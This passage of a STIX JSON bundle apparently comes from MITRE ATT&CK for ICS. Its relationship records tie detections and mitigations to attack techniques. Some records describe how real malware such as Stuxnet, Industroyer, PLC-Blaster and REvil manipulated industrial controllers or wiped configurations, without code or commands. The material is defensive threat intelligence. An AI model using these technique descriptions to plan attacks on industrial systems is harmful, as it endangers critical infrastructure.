+ "id": "relationship--8f0fa80a-7f8c-4c54-9277-a6f69bafd6af", + "created": "2023-03-30T19:04:30.392Z", 
+ "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-30T19:04:30.392Z", + "description": "Monitor for API calls that may search local system sources, such as file systems or local databases, to find files of interest and sensitive data. ", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--9bde2f9d-a695-4344-bfac-f2dce13d121e", + "target_ref": "attack-pattern--fa3aa267-da22-4bdd-961f-03223322a8d5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--ab0b5170-577b-491e-8508-b9a34dc393c1", + "created": "2022-09-27T16:22:57.470Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-09-27T16:22:57.470Z", + "description": "Engineering and asset management software will often maintain a copy of the expected program loaded on a controller and may also record any changes made to controller programs. Data from these platforms can be used to identify modified controller programs.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--8ed4e6d0-56d7-4e6b-8fa6-41f41631f30d", + "target_ref": "attack-pattern--fc5fda7e-6b2c-4457-b036-759896a2efa2", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--cb6d67c0-33ba-4c49-ae70-d0e4f0f68794", + "created": "2023-03-30T14:08:42.386Z", + "revoked": false, + "external_references": [ + { + "source_name": "M. Rentschler and H. 
Heine", + "description": "M. Rentschler and H. Heine The Parallel Redundancy Protocol for industrial IP networks Retrieved. 2020/09/25 ", + "url": "https://ieeexplore.ieee.org/document/6505877" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-30T14:08:42.386Z", + "description": "Retain cold-standby or replacement hardware of similar models to ensure continued operations of critical functions if the primary system is compromised or unavailable. (Citation: M. Rentschler and H. Heine)", + "relationship_type": "mitigates", + "source_ref": "course-of-action--f0f5c87a-a58d-440a-b3b5-ca679d98c6dd", + "target_ref": "attack-pattern--fab8fc7d-f27f-4fbb-9de6-44740aade05f", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--b064068a-9e17-4ac8-9a92-a1338d7196c7", + "created": "2022-09-27T15:30:18.604Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-09-27T15:30:18.604Z", + "description": "Monitor logs from installed applications (e.g., historian logs) for unexpected commands or abuse of system features.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--9c2fa0ae-7abc-485a-97f6-699e3b6cf9fa", + "target_ref": "attack-pattern--24a9253e-8948-4c98-b751-8e2aee53127c", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--5886d4a1-2d4c-40d5-a689-69c475ab6ee2", + "created": "2022-09-26T15:37:30.958Z", 
+ "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-09-26T15:37:30.958Z", + "description": "Monitor for loss of network traffic which could indicate alarms are being suppressed. A loss of expected communications associated with network protocols used to communicate alarm events or process data could indicate this technique is being used. This will not directly detect the technique’s execution, but instead may provide additional evidence that the technique has been used and may complement other detections.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--a7f22107-02e5-4982-9067-6625d4a1765a", + "target_ref": "attack-pattern--2900bbd8-308a-4274-b074-5b8bde8347bc", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--eeeff03f-7436-4f76-8591-42075e6647d4", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.076Z", + "relationship_type": "mitigates", + "description": "All field controllers should restrict operating mode changes to only required authenticated users (e.g., engineers, field technicians), preferably through implementing a role-based access mechanism. 
Further, physical mechanisms (e.g., keys) can also be used to limit unauthorized operating mode changes.\n", + "source_ref": "course-of-action--e0d38502-decb-481d-ad8b-b8f0a0c330bd", + "target_ref": "attack-pattern--2883c520-7957-46ca-89bd-dab1ad53b601", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "type": "relationship", + "id": "relationship--9515f24c-1c33-4197-b9c9-b9992bc696ca", + "created": "2021-04-13T11:15:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Spenneberg, Ralf, Maik Brggemann, and Hendrik Schwartke March 2016", + "description": "Spenneberg, Ralf, Maik Brggemann, and Hendrik Schwartke 2016, March 31 Plc-blaster: A worm living solely in the plc. Retrieved. 2017/09/19 ", + "url": "https://www.blackhat.com/docs/asia-16/materials/asia-16-Spenneberg-PLC-Blaster-A-Worm-Living-Solely-In-The-PLC-wp.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-12T18:02:12.812Z", + "description": "[PLC-Blaster](https://attack.mitre.org/software/S1006) copies itself to various Program Organization Units (POU) on the target device. The POUs include the Data Block, Function, and Function Block. 
(Citation: Spenneberg, Ralf, Maik Brggemann, and Hendrik Schwartke March 2016)", + "relationship_type": "uses", + "source_ref": "malware--4dcff507-5af8-47ce-964a-8d9569e9ccfe", + "target_ref": "attack-pattern--fc5fda7e-6b2c-4457-b036-759896a2efa2", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--8985cd3c-1429-4681-ad2e-9b3e46588a44", + "created": "2022-05-11T16:22:58.806Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-09-26T18:41:09.265Z", + "description": "Monitor ICS management protocols / file transfer protocols for protocol functions related to firmware changes.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--3772e279-27d6-477a-9fe3-c6beb363594c", + "target_ref": "attack-pattern--efbf7888-f61b-4572-9c80-7e2965c60707", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--220140ac-d927-4d86-9335-c04aa6ee3c61", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.126Z", + "relationship_type": "mitigates", + "description": "Deny direct remote access to internal systems through the use of network proxies, gateways, and firewalls. Consider a jump server or host into the DMZ for greater access control. Leverage this DMZ or corporate resources for vendor access. 
(Citation: Keith Stouffer May 2015)\n", + "source_ref": "course-of-action--1e7ccfc0-94c8-496e-8d27-032120892291", + "target_ref": "attack-pattern--8d2f3bab-507c-4424-b58b-edc977bd215c", + "external_references": [ + { + "source_name": "Keith Stouffer May 2015", + "description": "Keith Stouffer 2015, May Guide to Industrial Control Systems (ICS) Security Retrieved. 2018/03/28 ", + "url": "https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-82r2.pdf" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "type": "relationship", + "id": "relationship--7f1e688d-65f7-4737-a4ba-ee482710f8ec", + "created": "2022-05-11T16:22:58.804Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-14T18:40:55.168Z", + "description": "Monitor for application logging, messaging, and/or other artifacts that may result from Denial of Service (DoS) attacks which degrade or block the availability of services to users. 
In addition to network level detections, endpoint logging and instrumentation can be useful for detection.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--9c2fa0ae-7abc-485a-97f6-699e3b6cf9fa", + "target_ref": "attack-pattern--1b22b676-9347-4c55-9a35-ef0dc653db5b", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--502a0b7e-048a-468a-b888-e91fde47c6eb", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2021-04-12T18:59:17.429Z", + "modified": "2022-05-06T17:47:24.189Z", + "relationship_type": "mitigates", + "description": "Segment and control software movement between business and OT environments by way of one directional DMZs. Web access should be restricted from the OT environment. Engineering workstations, including transient cyber assets (TCAs) should have minimal connectivity to external networks, including Internet and email, further limit the extent to which these devices are dual-homed to multiple networks. (Citation: North America Transmission Forum December 2019)\n", + "source_ref": "course-of-action--1e7ccfc0-94c8-496e-8d27-032120892291", + "target_ref": "attack-pattern--e1f9cdd2-9511-4fca-90d7-f3e92cfdd0bf", + "external_references": [ + { + "source_name": "North America Transmission Forum December 2019", + "description": "North America Transmission Forum 2019, December NATF Transient Cyber Asset Guidance Retrieved. 
2020/09/25 ", + "url": "https://www.natf.net/docs/natf/documents/resources/security/natf-transient-cyber-asset-guidance.pdf" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--5f03ee5d-534c-454c-aae3-b41130b00286", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2021-04-13T12:08:26.506Z", + "modified": "2022-05-06T17:47:24.117Z", + "relationship_type": "mitigates", + "description": "Make it difficult for adversaries to advance their operation through exploitation of undiscovered or unpatched vulnerabilities by using sandboxing. Other types of virtualization and application microsegmentation may also mitigate the impact of some types of exploitation. Risks of additional exploits and weaknesses in these systems may still exist. (Citation: Dan Goodin March 2017)\n", + "source_ref": "course-of-action--059ba11e-e3dc-49aa-84ca-88197f40d4ea", + "target_ref": "attack-pattern--cfe68e93-ce94-4c0f-a57d-3aa72cedd618", + "external_references": [ + { + "source_name": "Dan Goodin March 2017", + "description": "Dan Goodin 2017, March Virtual machine escape fetches $105,000 at Pwn2Own hacking contest Retrieved. 
2020/09/25 ", + "url": "https://arstechnica.com/information-technology/2017/03/hack-that-escapes-vm-by-exploiting-edge-browser-fetches-105000-at-pwn2own/" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "type": "relationship", + "id": "relationship--86b868be-3e59-4497-9aa9-a2cd951a8f72", + "created": "2022-05-11T16:22:58.803Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-09-26T15:01:39.537Z", + "description": "Monitor application logs for changes to settings and other events associated with network protocols that may be used to block communications.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--9c2fa0ae-7abc-485a-97f6-699e3b6cf9fa", + "target_ref": "attack-pattern--008b8f56-6107-48be-aa9f-746f927dbb61", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--129a4d3f-fa4a-42c3-833e-8f15155b9693", + "type": "relationship", + "created": "2022-03-09T23:42:34.056Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Secureworks IRON VIKING ", + "url": "https://www.secureworks.com/research/threat-profiles/iron-viking", + "description": "Secureworks. (2020, May 1). IRON VIKING Threat Profile. Retrieved June 10, 2020." 
+ } + ], + "modified": "2022-03-09T23:42:34.056Z", + "description": "(Citation: Secureworks IRON VIKING )", + "relationship_type": "uses", + "source_ref": "intrusion-set--381fcf73-60f6-4ab2-9991-6af3cbc35192", + "target_ref": "malware--2eaa5319-5e1e-4dd7-bbc4-566fced3964a", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--50b3247a-ea71-455e-b299-f00666c05146", + "created": "2017-12-14T16:46:06.044Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Nicolas Falliere, Liam O Murchu, Eric Chien February 2011", + "description": "Nicolas Falliere, Liam O Murchu, Eric Chien 2011, February W32.Stuxnet Dossier (Version 1.4) Retrieved. 2017/09/22 ", + "url": "https://www.wired.com/images_blogs/threatlevel/2011/02/Symantec-Stuxnet-Update-Feb-2011.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-09-20T21:12:35.411Z", + "description": "In states 3 and 4 [Stuxnet](https://attack.mitre.org/software/S0603) sends two network bursts (done through the DP_SEND primitive). The data in the frames are instructions for the frequency converter drives. For example one of the frames contains records that change the maximum frequency (the speed at which the motor will operate). The frequency converter drives consist of parameters, which can be remotely configured via Profibus. One can write new values to these parameters changing the behavior of the device. 
(Citation: Nicolas Falliere, Liam O Murchu, Eric Chien February 2011)", + "relationship_type": "uses", + "source_ref": "malware--088f1d6e-0783-47c6-9923-9c79b2af43d4", + "target_ref": "attack-pattern--097924ce-a9a9-4039-8591-e0deedfb8722", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--8a604466-8437-4fe6-b6db-ec8fb05d702a", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Anton Cherepanov, ESET June 2017", + "description": "Anton Cherepanov, ESET 2017, June 12 Win32/Industroyer: A new threat for industrial control systems Retrieved. 2017/09/15 ", + "url": "https://www.welivesecurity.com/wp-content/uploads/2017/06/Win32_Industroyer.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-09-23T18:49:59.817Z", + "description": "In [Industroyer](https://attack.mitre.org/software/S0604) the first COM port from the configuration file is used for the actual communication and the two other COM ports are just opened to prevent other processes accessing them. Thus, the IEC 101 payload component is able to take over and maintain control of the RTU device. 
(Citation: Anton Cherepanov, ESET June 2017)", + "relationship_type": "uses", + "source_ref": "malware--e401d4fe-f0c9-44f0-98e6-f93487678808", + "target_ref": "attack-pattern--1c478716-71d9-46a4-9a53-fa5d576adb60", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--3b6567a9-6213-4db4-a069-1a86b1098b63", + "created": "2021-04-13T12:08:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Microsoft Security Response Center August 2017", + "description": "Microsoft Security Response Center 2017, August Moving Beyond EMET II Windows Defender Exploit Guard Retrieved. 2020/09/25 ", + "url": "https://msrc-blog.microsoft.com/2017/08/09/moving-beyond-emet-ii-windows-defender-exploit-guard/" + }, + { + "source_name": "Wikipedia", + "description": "Wikipedia Microsoft Security Response Center 2017, August Moving Beyond EMET II Windows Defender Exploit Guard Retrieved. 2020/09/25 Control-flow integrity Retrieved. 2020/09/25 ", + "url": "https://en.wikipedia.org/wiki/Control-flow_integrity" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-21T13:18:50.929Z", + "description": "Security applications that look for behavior used during exploitation such as Windows Defender Exploit Guard (WDEG) and the Enhanced Mitigation Experience Toolkit (EMET) can be used to mitigate some exploitation behavior. (Citation: Microsoft Security Response Center August 2017) Control flow integrity checking is another way to potentially identify and stop a software exploit from occurring. 
(Citation: Wikipedia) Many of these protections depend on the architecture and target application binary for compatibility and may not work for all software or services targeted.\n", + "relationship_type": "mitigates", + "source_ref": "course-of-action--49363b74-d506-4342-bd63-320586ebadb9", + "target_ref": "attack-pattern--cfe68e93-ce94-4c0f-a57d-3aa72cedd618", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--f497fd3e-8f05-4db2-97cc-48a8d35a8827", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.091Z", + "relationship_type": "mitigates", + "description": "Develop and publish policies that define acceptable information to be stored in repositories.\n", + "source_ref": "course-of-action--dc61c280-c29d-44e5-a960-c0dd1623d2ba", + "target_ref": "attack-pattern--3405891b-16aa-4bd7-bd7c-733501f9b20f", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "type": "relationship", + "id": "relationship--6e329090-fc8c-4a7f-bbf9-08067ad9ebe5", + "created": "2023-03-10T20:35:16.772Z", + "revoked": false, + "external_references": [ + { + "source_name": "Marshall Abrams July 2008", + "description": "Marshall Abrams 2008, July 23 Malicious Control System Cyber Security Attack Case Study Maroochy Water Services, Australia Retrieved. 
2018/03/27 ", + "url": "https://www.mitre.org/sites/default/files/pdf/08_1145.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-10T20:35:16.772Z", + "description": "In the [Maroochy Water Breach](https://attack.mitre.org/campaigns/C0020), the adversary used a dedicated analog two-way radio system to send false data and instructions to pumping stations and the central computer.(Citation: Marshall Abrams July 2008)", + "relationship_type": "uses", + "source_ref": "campaign--70cab19e-1745-425e-b3db-c02cd5ff157a", + "target_ref": "attack-pattern--8535b71e-3c12-4258-a4ab-40257a1becc4", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--b2e10e48-8bd9-472a-9c6f-1d38650e8df1", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.239Z", + "relationship_type": "mitigates", + "description": "Techniques can include (i) reducing transmission power on wireless signals, (ii) adjusting antenna gain to prevent extensions beyond organizational boundaries, and (iii) employing RF shielding techniques to block excessive signal propagation. 
(Citation: DHS National Urban Security Technology Laboratory April 2019)\n", + "source_ref": "course-of-action--fce6866f-9a87-4d3e-a73c-f02d8937fe0e", + "target_ref": "attack-pattern--2877063e-1851-48d2-bcc6-bc1d2733157e", + "external_references": [ + { + "source_name": "DHS National Urban Security Technology Laboratory April 2019", + "description": "DHS National Urban Security Technology Laboratory 2019, April Radio Frequency Detection, Spectrum Analysis, and Direction Finding Equipment Retrieved. 2020/09/17 ", + "url": "https://www.dhs.gov/sites/default/files/saver-msr-rf-detection_cod-508_10july2019.pdf" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "type": "relationship", + "id": "relationship--679e7b8d-57d7-4c1d-8f42-1496606ea666", + "created": "2018-04-18T17:59:24.739Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Jeff Jones May 2018", + "description": "Jeff Jones 2018, May 10 Dragos Releases Details on Suspected Russian Infrastructure Hacking Team ALLANITE Retrieved. 2020/01/03 ", + "url": "https://www.eisac.com/public-news-detail?id=115909" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-12T15:40:28.784Z", + "description": "[ALLANITE](https://attack.mitre.org/groups/G1000) utilized spear phishing to gain access into energy sector environments. 
(Citation: Jeff Jones May 2018)", + "relationship_type": "uses", + "source_ref": "intrusion-set--190242d7-73fc-4738-af68-20162f7a5aae", + "target_ref": "attack-pattern--648f995e-9c3a-41e4-aeee-98bb41037426", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--a1cbbdb5-30ad-4139-9784-e5a134f8d405", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Dragos Inc. June 2017", + "description": "Dragos Inc. 2017, June 13 Industroyer - Dragos - 201706: Analysis of the Threat to Electic Grid Operations Retrieved. 2017/09/18 ", + "url": "https://dragos.com/blog/crashoverride/CrashOverride-01.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-09-23T18:55:26.032Z", + "description": "[Industroyer](https://attack.mitre.org/software/S0604) has a destructive wiper that overwrites all ICS configuration files across the hard drives and all mapped network drives specifically targeting ABB PCM600 configuration files. (Citation: Dragos Inc. 
June 2017)", + "relationship_type": "uses", + "source_ref": "malware--e401d4fe-f0c9-44f0-98e6-f93487678808", + "target_ref": "attack-pattern--493832d9-cea6-4b63-abe7-9a65a6473675", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--58269882-7e8d-4d24-b7a3-dbef6196cb61", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.086Z", + "relationship_type": "mitigates", + "description": "Use host-based allowlists to prevent devices from accepting connections from unauthorized systems. For example, allowlists can be used to ensure devices can only connect with master stations or known management/engineering workstations. (Citation: Department of Homeland Security September 2016)\n", + "source_ref": "course-of-action--aadac250-bcdc-44e3-a4ae-f52bd0a7a16a", + "target_ref": "attack-pattern--83ebd22f-b401-4d59-8219-2294172cf916", + "external_references": [ + { + "source_name": "Department of Homeland Security September 2016", + "description": "Department of Homeland Security 2016, September Retrieved. 
2020/09/25 ", + "url": "https://us-cert.cisa.gov/sites/default/files/recommended_practices/NCCIC_ICS-CERT_Defense_in_Depth_2016_S508C.pdf" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "type": "relationship", + "id": "relationship--c90cfddb-253b-41c8-9057-2abde6f8aa6d", + "created": "2021-04-12T18:49:06.044Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "SecureWorks September 2019", + "description": "SecureWorks 2019, September 24 REvil/Sodinokibi Ransomware Retrieved. 2021/04/12 ", + "url": "https://www.secureworks.com/research/revil-sodinokibi-ransomware" + }, + { + "source_name": "Tom Fakterman August 2019", + "description": "Tom Fakterman 2019, August 05 Sodinokibi: The Crown Prince of Ransomware Retrieved. 2021/04/12 ", + "url": "https://www.cybereason.com/blog/the-sodinokibi-ransomware-attack" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-12T18:06:28.859Z", + "description": "[REvil](https://attack.mitre.org/software/S0496) sends HTTPS POST messages with randomly generated URLs to communicate with a remote server. 
(Citation: Tom Fakterman August 2019) (Citation: SecureWorks September 2019)", + "relationship_type": "uses", + "source_ref": "malware--ac61f1f9-7bb1-465e-9b8a-c2ce8e88baf5", + "target_ref": "attack-pattern--e076cca8-2f08-45c9-aff7-ea5ac798b387", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--d4968f45-d06b-4843-8f72-6e08beb94cab", + "type": "relationship", + "created": "2017-05-31T21:33:27.070Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Symantec Dragonfly", + "description": "Symantec Security Response. (2014, June 30). Dragonfly: Cyberespionage Attacks Against Energy Suppliers. Retrieved April 8, 2016.", + "url": "https://community.broadcom.com/symantecenterprise/communities/community-home/librarydocuments/viewdocument?DocumentKey=7382dce7-0260-4782-84cc-890971ed3f17&CommunityKey=1ecf5f55-9545-44d6-b0f4-4e4a7f5f5e68&tab=librarydocuments" + }, + { + "source_name": "Gigamon Berserk Bear October 2021", + "url": "https://vblocalhost.com/uploads/VB2021-Slowik.pdf", + "description": "Slowik, J. (2021, October). THE BAFFLING BERSERK BEAR: A DECADE’S ACTIVITY TARGETING CRITICAL INFRASTRUCTURE. Retrieved December 6, 2021." 
+ } + ], + "modified": "2021-12-07T18:39:07.922Z", + "description": "(Citation: Symantec Dragonfly)(Citation: Gigamon Berserk Bear October 2021)", + "relationship_type": "uses", + "source_ref": "intrusion-set--1c63d4ec-0a75-4daa-b1df-0d11af3d3cc1", + "target_ref": "malware--083bb47b-02c8-4423-81a2-f9ef58572974", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--03e80e3c-28b9-4e7f-8b17-7c86d1483b91", + "created": "2023-03-30T19:00:12.380Z", + "revoked": false, + "external_references": [ + { + "source_name": "Keith Stouffer May 2015", + "description": "Keith Stouffer 2015, May Guide to Industrial Control Systems (ICS) Security Retrieved. 2018/03/28 ", + "url": "https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-82r2.pdf" + }, + { + "source_name": "National Institute of Standards and Technology April 2013", + "description": "National Institute of Standards and Technology 